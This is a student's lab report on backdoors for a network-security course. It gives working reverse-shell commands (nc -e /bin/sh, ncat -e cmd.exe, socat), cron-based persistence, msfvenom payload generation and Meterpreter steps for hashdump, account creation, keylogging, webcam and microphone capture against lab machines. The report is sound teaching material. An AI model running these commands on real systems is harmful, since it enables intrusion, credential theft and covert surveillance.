Exp2 後門原理與實踐 20154320 李超

 目錄
- 基礎問題回答
- 基礎知識
- 實驗過程
- 實驗心得體會

基礎知識問答
 1. 例舉你能想到的一個後門進入到你係統中的可能方式？
從不安全的網站上下載的程序可能存在後門。
 2. 例舉你知道的後門如何啓動起來(win及linux)的方式？

   操做系統可能自動啓動，如實驗中的cron服務和任務計劃。也能夠經過打開後門程序手動啓動。
3. Meterpreter有哪些給你映像深入的功能？

   答：截屏，錄像，以及鍵盤按鍵記錄。若是不加以防範，本身的操做記錄甚至操做時的圖像和音頻均可能被竊取，可能形成十分嚴重的後果。
4. 如何發現本身有系統有沒有被安裝後門？

   答 ：查看開機項中是否有本身不熟悉的或者可疑的項目。監控網絡看是否有可疑的傳輸過程。
  
基礎知識
 Netcat:

Netcat用於從TCP/UDP鏈接中讀取或發送網絡數據。cat是Linux中查看或鏈接文件的命令，因此netcat本意爲從網絡上查看文件內容。而Netcat的做者Hobbit爲它添加了很是豐富的功能，使它幾乎可以完成網絡操做中各式各樣的操做，因此Netcat在網絡安全領域被稱做「TCPIP的瑞士軍刀」（"Swiss-army knife forTCP/IP"）。

cron:

cron是一個linux下的定時執行工具，能夠在無需人工干預的狀況下運行做業。因爲Cron 是Linux的內置服務，但它不自動起來

 meterpreter:

Meterpreter是Metasploit的默認Windows系統下的Shell Code
之前Meterpreter只是Metasploit入侵時短時間湊活一下用的
一旦入侵成功後就儘快上傳遠控

可是如今新一代的Meterpreter變得異常強大
我甚至感受許多狀況下用Meterpreter進行操做就足夠了

特點功能1：快速提權
Getsystem命令快速提權
實在沒有比這個簡單的了
一條指令你就擁有了System權限

Meterpreter會本身嘗試用多種方法讓你得到System權限

特點功能2：Hashdump
運行這個命令：run post/windows/gather/hashdump
一條命令你就可以得到Windows的Sam 數據庫裏的內容
就是通過加密的用戶名和密碼

特點功能3：直接打開3389
Getgui命令是Meterpreter新添加的命令
這個命令可以讓你輕鬆的在目標系統上打開3389遠程管理
這條命令有兩個用法：run getgui -e（僅僅是打開遠程管理）
run getgui -u hacker -p s3cr3t（打開遠程管理而且創造一個新的用戶名爲Hacker密碼爲s3cr3t的賬號）

特點功能4：網絡嗅探
Meterpreter擁有很是強大的網絡嗅探能力
它可以不在目標系統上安裝任何驅動的狀況下進行網絡嗅探
並且它還聰明到了本身的流量要被忽略掉

特點功能5：網絡中繼
每每入侵局域網黑客碰到的最大困難時沒法穿過NAT
如今有了Meterpreter就輕鬆了
Meterpreter可以讓一臺你已經入侵的電腦變成中繼，來入侵同一個局域網裏的其餘電腦

特點功能6：截屏
截屏看到對方電腦上正在作什麼
這個功能很容易理解吧

實驗過程

netcat獲取主機操做Shell，cron啓動

windows得到linux的shell
- windows平臺下利用cmd的ipconfig命令查看到本機的ip地址爲192.168.199.128

 

- windows下使用ncat.exe -l -p 4320命令運行ncat.exe監聽4320端口。

 

 

- kali下使用爲nc 192.168.199.128（即主機ip） 4320 -e /bin/sh命令鏈接windows的4320端口

 

- 鏈接成功後，咱們就能夠在windows主機獲取kali的信息，如輸入ls命令：

 

linux得到windows的shell

- kali下使用nc -l -p 4320命令監聽4320端口

- windows下使用ncat.exe -e cmd.exe 172.30.6.69 4328（即kali的IP地址）鏈接kali的4328端口。

 

 

- 鏈接成功後，咱們就能夠在kali主機獲取windows的信息，此時已成功獲取windows的shell

能夠輸入指令打開win計算器

使用netcat傳輸數據
- windows下使用ncat.exe -l -p 4320命令運行ncat.exe監聽4320端口。

 

- kali下使用爲nc 192.168.199.128（即主機ip） 4320命令鏈接windows的4320端口

 

- 創建鏈接後，嘗試傳輸

 

cron啓動
- windows下使用ncat.exe -l -p 4320命令運行ncat.exe監聽4320端口

用vi 修改cron文件

 

- kali下使用crontab -e命令，設置一條定時指令，設置成在12：45反向鏈接windows主機的4320端口

 

 

-12：45分時鏈接成功，成功得到linux的shell，輸入ls指令查看。

 

 socat獲取主機操做Shell, 任務計劃啓動

- windows下在控制面板->管理工具->任務計劃程序中新建一個觸發器

 

 

- kali下使用socat - tcp:192.168.199.128（即主機ip）:4320（端口），此時已成功獲取windows的shell。

 

msf-meterpreter 生成後門，傳輸到靶機獲取shell
- 在kali下輸入命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.128 LPORT=4320 -f exe > 20154320lc.exe 生成一個名爲20154320lc的後門程序

 

- 使用netcat將這個後門程序傳輸到windows主機上。在windows下輸入ncat.exe -lv 4320 > 20154320lc.exe

 

 

- 這裏在關閉防火牆和殺毒軟件 後運行。

使用msf獲取目標攝像頭，進行錄屏、鍵盤記錄等操做

- 首先msf打開監聽進程
- msfconsole //進入msf

- use exploit/multi/handler //進入handler模式

- set payload windows/meterpreter/reverse_tcp //設置payload

- set LHOST 192.168.199.128 //將LHOST設置爲LinuxIP地址

- set LPORT 4320 //設端口爲那個4320

 

- exploit //MSF開始監聽

查看獲取鍵盤輸入、截獲攝像頭、獲取截圖、錄音

- 鍵盤記錄

 

 

- 打開攝像頭
 

 

- 截屏

 

- record_mic // 截獲音頻

 

實驗感想- 此次實驗很是有趣，同時也讓我驚訝於計算機中漏洞、後門的危害性。作完實驗後我第一時間從新打開了電腦的防火牆而且把攝像頭用膠布封住。雖然此次實驗的內容不過是學習後門知識的一點皮毛，但足以讓我體會到網絡安全相當重要，以及學好網絡對抗技術這門課程在當今信息時代的重要性。